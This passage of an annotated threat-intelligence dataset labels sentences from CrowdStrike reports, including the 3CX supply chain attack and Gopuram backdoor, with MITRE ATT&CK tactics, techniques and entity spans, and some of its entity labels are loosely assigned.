access", "start": 57, "end": 79, "label": "Action" }, { "text": "use ", "start": 86, "end": 90, "label": "Action" }, { "text": "pivot ", "start": 112, "end": 118, "label": "Action" }, { "text": "via trusted remote access software and protocols", "start": 142, "end": 190, "label": "MalwareTool" }, { "text": "lifted credentials", "start": 90, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s505-aff2a4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 505, "context_before": "Adversaries often target vulnerable and unmanaged assets to gain initial access, then use lifted credentials to pivot to additional resources via trusted remote access software and protocols.", "sentence_text": "A mix of comprehensive endpoint coverage and proactive threat hunting is crucial for minimizing security gaps and detecting intrusions that aim to evade traditional detection methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s506-4c0503", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 506, "context_before": "A mix of comprehensive endpoint coverage and proactive threat hunting is crucial for minimizing security gaps and detecting intrusions that aim to evade traditional detection methods.", "sentence_text": "NOWHERE TO HIDE 44 THREAT ACTOR SPOTLIGHT: LABYRINTH CHOLLIMA Targeting the Supply Chain", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "LABYRINTH CHOLLIMA target supply chain", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 43, "end": 61, "label": "ThreatActor" }, { "text": "Targeting ", "start": 62, "end": 72, "label": "Action" }, { "text": "the Supply Chain", "start": 72, "end": 88, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s507-2504f7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 507, "context_before": "NOWHERE TO HIDE 44 THREAT ACTOR SPOTLIGHT: LABYRINTH CHOLLIMA Targeting the Supply Chain", "sentence_text": "This attack is the result of a unique and complex adversarial supply chain operation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "adversarial supply chain operation", "entities": [ { "text": "attack ", "start": 5, "end": 12, "label": "Action" }, { "text": "adversarial", "start": 50, "end": 61, "label": "MalwareTool" }, { "text": "supply chain", "start": 62, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "operation", "start": 75, "end": 84, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s508-cb2ade", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 508, "context_before": "This attack is the result of a unique and complex adversarial supply chain operation.", "sentence_text": "It was not simply a single supply chain compromise; rather, it was a layered exploitation — a double supply chain attack.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "supply chain attack", "entities": [ { "text": "supply chain compromise", "start": 27, "end": 50, "label": "Action" }, { "text": " double supply chain attack", "start": 93, "end": 120, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s509-d65f9d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 509, "context_before": "It was not simply a single supply chain compromise; rather, it was a layered exploitation — a double supply chain attack.", "sentence_text": "The threat actor first breached third-party software used by 3CX, which then provided the necessary conduit to ultimately compromise the 3CXDesktopApp.41", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "threat actor breached software used by 3CX then ultimately compromised 3CXDesktopApp", "entities": [ { "text": " threat actor", "start": 3, "end": 16, "label": "ThreatActor" }, { "text": "breached ", "start": 23, "end": 32, "label": "Action" }, { "text": "3CX", "start": 61, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "3CXDesktopApp", "start": 137, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s510-67286b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 510, "context_before": "The threat actor first breached third-party software used by 3CX, which then provided the necessary conduit to ultimately compromise the 3CXDesktopApp.41", "sentence_text": "The resulting compromise led to the delivery of the Gopuram backdoor, which affected both Windows and macOS versions of the software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" }, { "id": "T1659", "name": "Content Injection" } ], "procedure": "compromise led to delivery of gopuram backdoor", "entities": [ { "text": "delivery ", "start": 36, "end": 45, "label": "Action" }, { "text": "Gopuram backdoor", "start": 52, "end": 68, "label": "MalwareTool" }, { "text": "affected ", "start": 76, "end": 85, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s511-11b77a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 511, "context_before": "The resulting compromise led to the delivery of the Gopuram backdoor, which affected both Windows and macOS versions of the software.", "sentence_text": "Gopuram is a stealthy second-stage backdoor that employs numerous evasion techniques to gain unauthorized access and persist on the target host.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "Gopuram employs evasion techniques to gain unauthorized access and persist on the target host.", "entities": [ { "text": "Gopuram", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "employs numerous evasion techniques", "start": 49, "end": 84, "label": "Action" }, { "text": "gain unauthorized access", "start": 88, "end": 112, "label": "Action" }, { "text": "persist on the target host", "start": 117, "end": 143, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s512-99a222", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 512, "context_before": "Gopuram is a stealthy second-stage backdoor that employs numerous evasion techniques to gain unauthorized access and persist on the target host.", "sentence_text": "Once deployed, the backdoor enabled the threat actor to execute commands, upload and download files, manipulate processes and services, and exfiltrate sensitive data — posing a considerable threat to victim organizations' networks.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Execute commands, transfer files, manipulate processes and services, and exfiltrate sensitive data via backdoor.", "entities": [ { "text": "the threat actor", "start": 36, "end": 52, "label": "ThreatActor" }, { "text": "backdoor", "start": 19, "end": 27, "label": "MalwareTool" }, { "text": "execute commands", "start": 56, "end": 72, "label": "Action" }, { "text": "upload and download files", "start": 74, "end": 99, "label": "Action" }, { "text": "manipulate processes and services", "start": 101, "end": 134, "label": "Action" }, { "text": "exfiltrate sensitive data", "start": 140, "end": 165, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s513-ca1745", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 513, "context_before": "Once deployed, the backdoor enabled the threat actor to execute commands, upload and download files, manipulate processes and services, and exfiltrate sensitive data — posing a considerable threat to victim organizations' networks.42 LABYRINTH CHOLLIMA’s targets in this campaign were predominantly cryptocurrency companies, once again highlighting the unique nature of this DPRK-nexus threat actor's sophisticated operations focused on financial gain.", "sentence_text": "LABYRINTH CHOLLIMA, known for their history of supply chain attacks, managed to maintain the prolonged persistence of their backdoor within the infected application.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1525", "name": "Implant Internal Image" } ], "procedure": "LABYRINTH CHOLLIMA maintained backdoor with infected app", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "supply chain attacks", "start": 47, "end": 67, "label": "Action" }, { "text": " to maintain the prolonged persistence", "start": 76, "end": 114, "label": "Action" }, { "text": "backdoor ", "start": 124, "end": 133, "label": "MalwareTool" }, { "text": "the infected application", "start": 140, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s514-c84f40", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 514, "context_before": "LABYRINTH CHOLLIMA, known for their history of supply chain attacks, managed to maintain the prolonged persistence of their backdoor within the infected application.", "sentence_text": "This attack signifies an escalated threat with a double supply chain compromise and broad compatibility of their malware — highlighting their advanced tactics, robust operational capacity and ongoing multi-platform threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s515-d6d051", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 515, "context_before": "This attack signifies an escalated threat with a double supply chain compromise and broad compatibility of their malware — highlighting their advanced tactics, robust operational capacity and ongoing multi-platform threat.", "sentence_text": "The multi-platform threat presented by LABYRINTH CHOLLIMA's latest attack significantly broadens the group's potential victim landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s516-e0f236", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 516, "context_before": "The multi-platform threat presented by LABYRINTH CHOLLIMA's latest attack significantly broadens the group's potential victim landscape.", "sentence_text": "This underlines their adaptability and the increased risk they pose to diverse systems — specifically, the combination of Windows and macOS at once.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s517-8ab2d8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 517, "context_before": "This underlines their adaptability and the increased risk they pose to diverse systems — specifically, the combination of Windows and macOS at once.", "sentence_text": "However, this is not LABYRINTH CHOLLIMA’s first attack focused on macOS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p44-s518-5de5a8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 44, "sentence_id": 518, "context_before": "However, this is not LABYRINTH CHOLLIMA’s first attack focused on macOS.", "sentence_text": "For additional details on the discovery of the malware, visit https://www.crowdstrike.com/blog/crowdstrike-detects- and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/.\n41 For additional details on the double supply chain attack, visit https://krebsonsecurity.com/2023/04/3cx-breach-was- a-double-supply-chain-compromise/.\n42 For more information on the Gopuram backdoor, visit https://securelist.com/gopuram-backdoor-deployed-through- 3cx-supply-chain-attack/109344/.\n43 For more information, see CISA’s website: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s519-292c94", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 519, "context_before": "For additional details on the discovery of the malware, visit https://www.crowdstrike.com/blog/crowdstrike-detects- and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/.\n41 For additional details on the double supply chain attack, visit https://krebsonsecurity.com/2023/04/3cx-breach-was- a-double-supply-chain-compromise/.\n42 For more information on the Gopuram backdoor, visit https://securelist.com/gopuram-backdoor-deployed-through- 3cx-supply-chain-attack/109344/.\n43 For more information, see CISA’s website: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a.", "sentence_text": "NOWHERE TO HIDE 45 Conclusion This report pulls back the curtain on the reality that Falcon OverWatch threat hunters face daily: Adversaries are continuously striving to broaden their reach and deepen their impact, despite the barriers placed before them by security products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s520-7a32f3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 520, "context_before": "NOWHERE TO HIDE 45 Conclusion This report pulls back the curtain on the reality that Falcon OverWatch threat hunters face daily: Adversaries are continuously striving to broaden their reach and deepen their impact, despite the barriers placed before them by security products.", "sentence_text": "Falcon OverWatch values collaboration with their customers and the security community.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s521-d0a8a2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 521, "context_before": "Falcon OverWatch values collaboration with their customers and the security community.", "sentence_text": "This report aims to share perspectives and insights Falcon OverWatch threat hunters derive from seeing interactive intrusion attempts on a daily basis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s522-e402c8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 522, "context_before": "This report aims to share perspectives and insights Falcon OverWatch threat hunters derive from seeing interactive intrusion attempts on a daily basis.", "sentence_text": "Defenders can find specific recommendations on how to identify and disrupt adversary activity at the end of each section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s523-a0a534", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 523, "context_before": "Defenders can find specific recommendations on how to identify and disrupt adversary activity at the end of each section.", "sentence_text": "Executives and decision makers can find important facts and figures on the first page of each key theme.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s524-267802", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 524, "context_before": "Executives and decision makers can find important facts and figures on the first page of each key theme.", "sentence_text": "As the technologies and security products that organizations rely on evolve, so too do adversary tooling and tradecraft — at an alarming pace.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "adversaries' tools and tradecraft evolves", "entities": [ { "text": "adversary tooling and tradecraft", "start": 87, "end": 119, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s525-b715c6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 525, "context_before": "As the technologies and security products that organizations rely on evolve, so too do adversary tooling and tradecraft — at an alarming pace.", "sentence_text": "This is the niche that Hunters pursue human-driven threat hunting fills within the security industry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s526-ac401b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 526, "context_before": "This is the niche that Hunters pursue human-driven threat hunting fills within the security industry.", "sentence_text": "that they see in the adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s527-8883d8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 527, "context_before": "that they see in the adversary.", "sentence_text": "Falcon OverWatch managed threat hunting is built on the human analysis on a 24/7 basis to relentlessly hunt for anomalous or novel attacker tradecraft designed to evade other detection techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s528-f51df8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 528, "context_before": "Falcon OverWatch managed threat hunting is built on the human analysis on a 24/7 basis to relentlessly hunt for anomalous or novel attacker tradecraft designed to evade other detection techniques.", "sentence_text": "Falcon OverWatch Elite is a tailored threat hunting service built on top of Falcon OverWatch managed threat hunting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s529-be7b58", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 529, "context_before": "Falcon OverWatch Elite is a tailored threat hunting service built on top of Falcon OverWatch managed threat hunting.", "sentence_text": "Elite analysts work closely with customers to understand their unique structure and priorities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p45-s530-d1a71b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 45, "sentence_id": 530, "context_before": "Elite analysts work closely with customers to understand their unique structure and priorities.", "sentence_text": "Falcon OverWatch Elite helps organizations optimize their own hunting and security operations through expert coaching, proactive outreach and contextualized insights.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p46-s531-2d59d3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 46, "sentence_id": 531, "context_before": "Falcon OverWatch Elite helps organizations optimize their own hunting and security operations through expert coaching, proactive outreach and contextualized insights.", "sentence_text": "NOWHERE TO HIDE 46 About Falcon OverWatch The CrowdStrike Falcon OverWatch managed threat hunting service is built on the technology-based defenses with 24/7/365 human-led analysis to uncover attempts to subvert automated detection controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p46-s532-8afba5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 46, "sentence_id": 532, "context_before": "NOWHERE TO HIDE 46 About Falcon OverWatch The CrowdStrike Falcon OverWatch managed threat hunting service is built on the technology-based defenses with 24/7/365 human-led analysis to uncover attempts to subvert automated detection controls.", "sentence_text": "As part of the Counter Adversary Operations defensive unit, Falcon OverWatch actively partners with CrowdStrike Intelligence at the cutting edge of the threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p46-s533-bb4b29", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 46, "sentence_id": 533, "context_before": "As part of the Counter Adversary Operations defensive unit, Falcon OverWatch actively partners with CrowdStrike Intelligence at the cutting edge of the threat landscape.", "sentence_text": "The value of this data is augmented by Falcon OverWatch’s patented hunting workflows and specialized tooling that enable hunters to quickly process and distill this vast sea of data to identify threats in near real time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p46-s534-d3ede0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 46, "sentence_id": 534, "context_before": "The value of this data is augmented by Falcon OverWatch’s patented hunting workflows and specialized tooling that enable hunters to quickly process and distill this vast sea of data to identify threats in near real time.", "sentence_text": "Finally, Falcon OverWatch is informed by the latest threat intelligence on the tradecraft of 215+ threat groups tracked by CrowdStrike Intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p46-s535-341bda", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 46, "sentence_id": 535, "context_before": "Finally, Falcon OverWatch is informed by the latest threat intelligence on the tradecraft of 215+ threat groups tracked by CrowdStrike Intelligence.", "sentence_text": "For more information on how Falcon OverWatch performs its mission, please see https://www.crowdstrike.com/services/ managed-services/falcon-overwatch-threat-hunting/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p51-s536-516040", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 51, "sentence_id": 536, "context_before": "For more information on how Falcon OverWatch performs its mission, please see https://www.crowdstrike.com/services/ managed-services/falcon-overwatch-threat-hunting/.", "sentence_text": "SURFACE MANAGEMENT Continuously discovers and maps all internet-facing assets to shut down potential exposure with guided mitigation plans to reduce the attack surface INTEGRITY MONITORING Provides real-time, comprehensive and centralized visibility that boosts compliance and offers relevant contextual data CYBERSECURITY Automates collection of point-in-time and historic forensic triage data for robust analysis of cybersecurity incidents Identity Protection Enables hyper-accurate detection of identity-based threats in real time, leveraging AI and behavioral analytics to provide deep actionable insights to stop modern attacks like ransomware", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p52-s537-ed7e8a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 52, "sentence_id": 537, "context_before": "SURFACE MANAGEMENT Continuously discovers and maps all internet-facing assets to shut down potential exposure with guided mitigation plans to reduce the attack surface INTEGRITY MONITORING Provides real-time, comprehensive and centralized visibility that boosts compliance and offers relevant contextual data CYBERSECURITY Automates collection of point-in-time and historic forensic triage data for robust analysis of cybersecurity incidents Identity Protection Enables hyper-accurate detection of identity-based threats in real time, leveraging AI and behavioral analytics to provide deep actionable insights to stop modern attacks like ransomware", "sentence_text": "NOWHERE TO HIDE 52 Enables hyper-accurate threat detection and real-time prevention of identity-based attacks by combining the power of advanced AI, behavioral analytics and a flexible policy engine to enforce risk-based conditional access PROTECTION Provides a fully managed identity protection solution delivering frictionless, real-time identity threat prevention and IT policy enforcement, monitoring and remediation — powered by CrowdStrike’s team of experts Helps you deploy the Falcon identity protection solutions to stop identity-based attacks from impacting your business using the expertise of our professional services:\n¼ Identity Security Assessment ¼ Falcon Operational Support Services for Identity Protection Observability Purpose-built for large-scale logging and real-time analysis of all of your data, metrics and traces, providing live observability for organizations of all sizes", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p52-s538-d4cd55", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 52, "sentence_id": 538, "context_before": "NOWHERE TO HIDE 52 Enables hyper-accurate threat detection and real-time prevention of identity-based attacks by combining the power of advanced AI, behavioral analytics and a flexible policy engine to enforce risk-based conditional access PROTECTION Provides a fully managed identity protection solution delivering frictionless, real-time identity threat prevention and IT policy enforcement, monitoring and remediation — powered by CrowdStrike’s team of experts Helps you deploy the Falcon identity protection solutions to stop identity-based attacks from impacting your business using the expertise of our professional services:\n¼ Identity Security Assessment ¼ Falcon Operational Support Services for Identity Protection Observability Purpose-built for large-scale logging and real-time analysis of all of your data, metrics and traces, providing live observability for organizations of all sizes", "sentence_text": "UNIFIED DATA STORAGE Reduces cost and improves visibility with long-term scalable storage of historical and real-time Falcon platform data DATA LOGGING AND OBSERVABILITY Delivers expertise and continuous guidance for log management and observability programs to ingest, aggregate and analyze massive volumes of streaming log data at petabyte scale", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p54-s539-78cf6f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 54, "sentence_id": 539, "context_before": "UNIFIED DATA STORAGE Reduces cost and improves visibility with long-term scalable storage of historical and real-time Falcon platform data DATA LOGGING AND OBSERVABILITY Delivers expertise and continuous guidance for log management and observability programs to ingest, aggregate and analyze massive volumes of streaming log data at petabyte scale", "sentence_text": "NOWHERE TO HIDE 54 About CrowdStrike security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk-endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p54-s540-388065", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 54, "sentence_id": 540, "context_before": "NOWHERE TO HIDE 54 About CrowdStrike security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk-endpoints and cloud workloads, identity and data.", "sentence_text": "We stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p54-s541-bf2f8c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 54, "sentence_id": 541, "context_before": "We stop breaches.", "sentence_text": "Learn more: www.crowdstrike.com Follow us:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s1-4a7976", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Falcon Adversary OverWatch: Cross-Domain Threat Hunting Solution Brief Falcon Adversary OverWatch:\nCross-Domain\nThreat Hunting\nDisrupt attacks across identities, cloud and endpoints with the industry’s most complete threat hunting service powered by AI and elite adversary intelligence Challenges Key benefits Cross-domain attacks have become mainstream, with adversaries exploiting valid credentials to breach cloud environments and move laterally to endpoints, thereby • Unified visibility:\nincreasing the efficiency and success of their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s2-8732fc", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 2, "context_before": "Falcon Adversary OverWatch: Cross-Domain Threat Hunting Solution Brief Falcon Adversary OverWatch:\nCross-Domain\nThreat Hunting\nDisrupt attacks across identities, cloud and endpoints with the industry’s most complete threat hunting service powered by AI and elite adversary intelligence Challenges Key benefits Cross-domain attacks have become mainstream, with adversaries exploiting valid credentials to breach cloud environments and move laterally to endpoints, thereby • Unified visibility:\nincreasing the efficiency and success of their operations.", "sentence_text": "The number of attacks by cloud-conscious adversaries identities and endpoints.\ncontinued to grow in 2023, with 110% more cases than the • Cross-domain threat previous year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s3-47922a", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 3, "context_before": "The number of attacks by cloud-conscious adversaries identities and endpoints.\ncontinued to grow in 2023, with 110% more cases than the • Cross-domain threat previous year.", "sentence_text": "Their preference for identity-based techniques hunting: Falcon in these cloud-focused attacks is evident — 75% of attacks Adversary OverWatch to gain access were malware-free and primarily relied on stops breaches everywhere by monitoring stolen credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s4-d37475", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 4, "context_before": "Their preference for identity-based techniques hunting: Falcon in these cloud-focused attacks is evident — 75% of attacks Adversary OverWatch to gain access were malware-free and primarily relied on stops breaches everywhere by monitoring stolen credentials.", "sentence_text": "Once inside, adversaries can move laterally for compromised within the network in just over 2 minutes — the fastest eCrime users in cloud attacks breakout time observed in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s5-0c050e", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 5, "context_before": "Once inside, adversaries can move laterally for compromised within the network in just over 2 minutes — the fastest eCrime users in cloud attacks breakout time observed in 2023.", "sentence_text": "and tracking lateral movements between The fragmentation across domains poses significant cloud and endpoint for a challenges, with each requiring different hunting comprehensive response.\nmethodologies and tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s6-f0c6c0", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 6, "context_before": "and tracking lateral movements between The fragmentation across domains poses significant cloud and endpoint for a challenges, with each requiring different hunting comprehensive response.\nmethodologies and tactics.", "sentence_text": "Breaking down these silos • Protection from Day requires elite expertise along with integrated telemetry One: With no downtime for a unified end-to-end response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s7-a70d62", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 7, "context_before": "Breaking down these silos • Protection from Day requires elite expertise along with integrated telemetry One: With no downtime for a unified end-to-end response.", "sentence_text": "Defenders must adopt or additional action a robust detection and response strategy with extensive from customers, Falcon Adversary OverWatch visibility across all domains and rapid response capabilities to immediately correlates effectively stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p1-s8-cf89f4", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 1, "sentence_id": 8, "context_before": "Defenders must adopt or additional action a robust detection and response strategy with extensive from customers, Falcon Adversary OverWatch visibility across all domains and rapid response capabilities to immediately correlates effectively stop breaches.", "sentence_text": "cross-domain events to detect threats, ensuring no adversary slips through unnoticed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s9-6403d6", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "cross-domain events to detect threats, ensuring no adversary slips through unnoticed.", "sentence_text": "Falcon Adversary OverWatch: Cross-Domain Threat Hunting Solution capability to rapidly detect advanced cross-domain threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s10-f8d5cc", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "Falcon Adversary OverWatch: Cross-Domain Threat Hunting Solution capability to rapidly detect advanced cross-domain threats.", "sentence_text": "By leveraging industry-first unified visibility across cloud environments, identities, and endpoints, CrowdStrike experts effectively hunt threats across domains, monitoring for compromised users in cloud attacks and tracking lateral movement between cloud and endpoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 